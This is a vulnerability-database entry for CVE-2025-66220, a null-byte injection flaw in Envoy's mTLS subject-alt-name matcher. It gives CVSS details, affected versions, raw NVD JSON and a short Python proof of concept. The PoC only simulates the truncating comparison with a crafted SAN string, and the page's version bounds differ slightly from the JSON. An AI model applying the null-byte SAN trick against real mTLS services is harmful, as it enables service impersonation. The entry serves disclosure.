Security Vulnerability Report
CVE-2025-66220 CVSS 5.0 MEDIUM

CVE-2025-66220

Published: 2025-12-03 19:15:58
Last Modified: 2025-12-05 15:44:27

Description

Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy’s mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\0) inside an OTHERNAME SAN value as valid matches.

CVSS Details

CVSS Score
5.0
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* (Envoy < 1.33.12) - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* (Envoy < 1.34.10) - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* (Envoy < 1.35.6) - VULNERABLE
cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:* (Envoy < 1.36.2) - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66220 PoC - Envoy mTLS OTHERNAME null-byte injection demonstration
# This PoC demonstrates the concept of embedding null bytes in OTHERNAME SAN values.
# It only simulates the matcher's string comparison; it does not build a real certificate.
import binascii


def create_malicious_cert_with_null_byte():
    """
    Demonstrate an OTHERNAME SAN value with an embedded null byte.

    This PoC demonstrates the vulnerability where Envoy may incorrectly treat
    certificates with embedded null bytes as valid matches.
    """
    # OTHERNAME with embedded null byte
    # The null byte can cause string termination issues in C++ parsing
    normal_name = b"legitimate-service.example.com"
    malicious_name = b"legitimate-service.example.com\x00attacker-controlled.com"

    print("[*] Demonstrating OTHERNAME SAN null byte injection vulnerability")
    print(f"[+] Normal SAN value: {normal_name.decode()}")
    print(f"[+] Malicious SAN value (hex): {binascii.hexlify(malicious_name).decode()}")
    print(f"[+] Malicious SAN value (with null): {malicious_name.decode('utf-8', errors='ignore')}")
    print("\n[*] The embedded null byte (\\x00) may cause:")
    print("    - String truncation during certificate parsing")
    print("    - Incorrect certificate matching in Envoy's mTLS matcher")
    print("    - Bypass of certificate validation checks")

    # Simulate certificate matching behavior
    def envoy_cert_match(cert_san, expected_san):
        """
        Simplified simulation of Envoy's certificate matching logic.
        A vulnerable implementation may not handle null bytes correctly.
        """
        # Vulnerable: C-string style comparison stops at the first null byte,
        # so everything after \x00 is silently ignored
        cert_san_truncated = cert_san.split(b'\x00')[0]
        return cert_san_truncated == expected_san

    expected = b"legitimate-service.example.com"
    result = envoy_cert_match(malicious_name, expected)
    print(f"\n[*] Certificate matching result: {result}")
    if result:
        print("[!] VULNERABLE: Malicious certificate matched as valid!")
    else:
        print("[+] SAFE: Malicious certificate correctly rejected")

    return malicious_name


# Usage example
if __name__ == "__main__":
    create_malicious_cert_with_null_byte()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66220", "sourceIdentifier": "[email protected]", "published": "2025-12-03T19:15:58.010", "lastModified": "2025-12-05T15:44:26.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, Envoy’s mTLS certificate matcher for match_typed_subject_alt_names may incorrectly treat certificates containing an embedded null byte (\\0) inside an OTHERNAME SAN value as valid matches."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:L/A:N", "baseScore": 5.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.7, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-170"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.33.13", "matchCriteriaId": "B303FFFE-9973-4E7E-8A8C-DE847B725534"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.34.0", 
"versionEndExcluding": "1.34.11", "matchCriteriaId": "4419A82D-995F-4DD0-BAE1-3825791245D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.35.0", "versionEndExcluding": "1.35.7", "matchCriteriaId": "C50E067C-AE0D-4B14-A442-53603039EFCD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.36.0", "versionEndExcluding": "1.36.3", "matchCriteriaId": "B39C3DF2-E73F-4B66-9504-C24E329ACB54"}]}]}], "references": [{"url": "https://github.com/envoyproxy/envoy/security/advisories/GHSA-rwjg-c3h2-f57p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}